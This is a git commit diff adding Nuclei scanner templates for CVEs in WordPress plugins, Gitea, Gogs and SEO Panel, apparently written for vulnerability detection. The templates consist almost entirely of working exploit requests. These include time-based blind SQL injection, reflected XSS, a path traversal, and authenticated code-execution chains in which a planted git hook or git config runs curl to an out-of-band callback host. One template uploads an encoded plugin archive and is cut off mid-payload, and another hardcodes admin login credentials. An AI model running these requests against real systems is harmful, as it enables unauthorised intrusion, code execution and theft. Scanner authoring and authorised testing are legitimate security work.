commit
55d45baf57
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2020-11530
|
||||
|
||||
info:
|
||||
name: Chopslider <= 3.4 - Unauthenticated Blind SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a
|
||||
- https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11530
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-11530
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,sqli,wpscan,wordpress,wp-plugin,wp,chopslider,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout 10s
|
||||
GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/javascript")'
|
||||
- 'contains(body, "$(document).ready(function()")'
|
||||
condition: and
|
|
@ -0,0 +1,98 @@
|
|||
id: CVE-2020-14144
|
||||
|
||||
info:
|
||||
name: Gitea Git Hooks Remote Code Execution
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.
|
||||
remediation: Fixed in version 1.16.7
|
||||
reference:
|
||||
- https://dl.gitea.io/gitea/1.16.6
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-14144
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2020-14144
|
||||
cwe-id: CWE-78
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: html:"Powered by Gitea Version"
|
||||
tags: cve,cve2020,rce,gitea,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /user/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /user/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
|
||||
|
||||
- |
|
||||
GET /repo/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /repo/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master
|
||||
|
||||
- |
|
||||
POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
|
||||
|
||||
- |
|
||||
GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "Gitea:"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_csrf" value="(.*)"'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: auth_csrf
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_csrf" content="(.*)"'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: last_commit
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="last_commit" value="(.*)"'
|
||||
internal: true
|
|
@ -0,0 +1,95 @@
|
|||
id: CVE-2020-15867
|
||||
|
||||
info:
|
||||
name: Gogs Git Hooks - Remote Code Execution
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution. There can be a privilege escalation if access to this hook feature is granted to a user who does not have administrative privileges.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-15867
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2020-15867
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /user/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /user/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
|
||||
|
||||
- |
|
||||
GET /repo/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /repo/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on
|
||||
|
||||
- |
|
||||
POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
|
||||
|
||||
- |
|
||||
GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- 'content="Gogs'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_csrf" value="(.*)"'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: auth_csrf
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_csrf" content="(.*)"'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: last_commit
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="last_commit" value="(.*)"'
|
||||
internal: true
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2020-7107
|
||||
|
||||
info:
|
||||
name: Ultimate FAQ < 1.8.30 - Cross Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The Ultimate FAQ plugin before 1.8.30 for WordPress allows XSS via Display_FAQ to Shortcodes/DisplayFAQs.php.
|
||||
remediation: Fixed in version 1.8.30
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33
|
||||
- https://wordpress.org/plugins/ultimate-faqs/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-7107
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2020-7107
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,xss,wordpress,wp-plugin,wp,ultimate-faqs
|
||||
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'</script><svg/onload=alert(document.cookie)>"
|
||||
- "var Display_FAQ_ID ="
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-24436
|
||||
|
||||
info:
|
||||
name: W3 Total Cache < 2.1.3 - Reflected XSS in Extensions Page
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The W3 Total Cache WordPress plugin before 2.1.4 was vulnerable to a reflected Cross-Site Scripting (XSS) security vulnerability within the "extension" parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This could allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.
|
||||
remediation: Fixed in version 2.1.4
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0
|
||||
- https://wordpress.org/plugins/w3-total-cache/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24436
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-24436
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=w3tc_extensions&extension="%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- status_code_2 == 200
|
||||
- contains(body_2, '><script>alert(document.domain)</script>&action=view')
|
||||
- contains(all_headers_2, "text/html")
|
||||
condition: and
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-24452
|
||||
|
||||
info:
|
||||
name: W3 Total Cache < 2.1.5 - Cross-Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The W3 Total Cache WordPress plugin before 2.1.5 was affected by a reflected Cross-Site Scripting (XSS) issue within the "extension" parameter in the Extensions dashboard, when the 'Anonymously track usage to improve product quality' setting is enabled, as the parameter is output in a JavaScript context without proper escaping. This could allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.
|
||||
remediation: Fixed in version 2.1.5
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0
|
||||
- https://wordpress.org/plugins/w3-total-cache/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24452
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-24452
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- status_code_2 == 200
|
||||
- contains(body_2, 'extensions/\'-alert(document.domain)-\'') && contains(body_2, 'w3-total-cache')
|
||||
- contains(all_headers_2, "text/html")
|
||||
condition: and
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-24862
|
||||
|
||||
info:
|
||||
name: RegistrationMagic < 5.0.1.6 - Admin+ SQL Injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue.
|
||||
remediation: Fixed in version 5.0.1.6
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615
|
||||
- https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24862
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2021-24862
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,registrationmagic,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_2>=6'
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_3, "rm_user_role_mananger_form")'
|
||||
condition: and
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2021-24970
|
||||
|
||||
info:
|
||||
name: All-In-One-Gallery - Local File Inclusion
|
||||
author: r3Y3r53
|
||||
severity: high
|
||||
description: |
|
||||
The All-in-One Video Gallery WordPress plugin before 2.5.0 does not sanitise and validate the tab parameter before using it in a require statement in the admin dashboard, leading to a Local File Inclusion issue
|
||||
remediation: Fixed in version 2.5.4
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10
|
||||
- https://wordpress.org/plugins/all-in-one-video-gallery
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24970
|
||||
classification:
|
||||
cve-id: CVE-2021-24970
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,wp,wp-plugin,wordpress,lfi,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(content_type_2, "text/html")'
|
||||
- 'contains(body_2, "All-in-One Video Gallery")'
|
||||
- 'contains(body_2, "Hello world!")'
|
||||
- 'contains(body_2, "Welcome to WordPress")'
|
||||
condition: and
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2021-28419
|
||||
|
||||
info:
|
||||
name: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The "order_col" parameter in archive.php of SEO Panel 4.8.0 is vulnerable to time-based blind SQL injection, which leads to the ability to retrieve all databases.
|
||||
reference:
|
||||
- https://github.com/seopanel/Seo-Panel/issues/209
|
||||
- https://www.seopanel.org/spdownload/4.8.0
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-28419
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2021-28419
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,seopanel,auth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: _csrf={{rand_base(54,"abc")}};
|
||||
|
||||
- |
|
||||
POST /login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}login.php
|
||||
Cookie: _csrf={{rand_base(54,"abc")}};
|
||||
|
||||
sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=
|
||||
|
||||
- |
|
||||
GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: _csrf={{rand_base(54,"abc")}};
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_3>=6'
|
||||
- 'status_code_3 == 200'
|
||||
- 'contains(body_3, "Overall Report Summary")'
|
||||
condition: and
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-0206
|
||||
|
||||
info:
|
||||
name: NewStatPress < 1.3.6 - Cross-Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not properly escape the whatX parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
|
||||
remediation: Fixed in version 1.3.6
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/ce12437a-d440-4c4a-9247-95a8f39d00b9
|
||||
- https://wordpress.org/plugins/newstatpress
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0206
|
||||
classification:
|
||||
cve-id: CVE-2022-0206
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,xss,wordpress,wp-plugin,wp,newstatpress,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log=admin&pwd=admin123&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(all_headers_2, "text/html")'
|
||||
- 'contains(body_2, "onanimationstart=alert(document.domain)")'
|
||||
- 'contains(body_2, "newstatpress_page")'
|
||||
condition: and
|
|
@ -0,0 +1,116 @@
|
|||
id: CVE-2022-0415
|
||||
|
||||
info:
|
||||
name: Gogs < 0.12.6 - Remote Command Execution
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Remote Command Execution in uploading repository file in GitHub repository gogs/gogs prior to 0.12.6.
|
||||
remediation: Fixed in version 0.12.6
|
||||
reference:
|
||||
- https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0415
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-0415
|
||||
cwe-id: CWE-78
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,rce,gogs,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /user/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /user/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
|
||||
|
||||
- |
|
||||
GET /repo/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /repo/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on
|
||||
|
||||
- |
|
||||
POST /{{username}}/{{randstr}}/upload-file HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json
|
||||
X-Requested-With: XMLHttpRequest
|
||||
X-Csrf-Token: {{auth_csrf}}
|
||||
Content-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395
|
||||
|
||||
-----------------------------313811965223810628771946318395
|
||||
Content-Disposition: form-data; name="file"; filename="config"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
[core]
|
||||
repositoryformatversion = 0
|
||||
filemode = true
|
||||
bare = false
|
||||
logallrefupdates = true
|
||||
ignorecase = true
|
||||
precomposeunicode = true
|
||||
sshCommand = curl http://{{interactsh-url}} -I
|
||||
[remote "origin"]
|
||||
url = git@github.com:torvalds/linux.git
|
||||
fetch = +refs/heads/*:refs/remotes/origin/*
|
||||
[branch "master"]
|
||||
remote = origin
|
||||
merge = refs/heads/master
|
||||
-----------------------------313811965223810628771946318395--
|
||||
|
||||
- |
|
||||
POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
|
||||
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- 'content="Gogs'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_csrf" value="(.*)"'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: auth_csrf
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_csrf" content="(.*)"'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: uuid
|
||||
group: 1
|
||||
regex:
|
||||
- ' "uuid": "(.*)"'
|
||||
internal: true
|
|
@ -0,0 +1,73 @@
|
|||
id: CVE-2022-1329
|
||||
|
||||
info:
|
||||
name: Elementor Website Builder Remote Code Execution Vulnerability
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2.
|
||||
remediation: Fixed in version 3.6.3
|
||||
reference:
|
||||
- https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/
|
||||
- https://wordpress.org/plugins/elementor/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1329
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-1329
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea
|
||||
|
||||
--336b29d7aee0463d8b651303eab505ea
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
||||
elementor_upload_and_install_pro
|
||||
--336b29d7aee0463d8b651303eab505ea
|
||||
Content-Disposition: form-data; name="_nonce"
|
||||
|
||||
{{nonce}}
|
||||
--336b29d7aee0463d8b651303eab505ea
|
||||
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.zip"
|
||||
|
||||
{{base64_decode("UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAA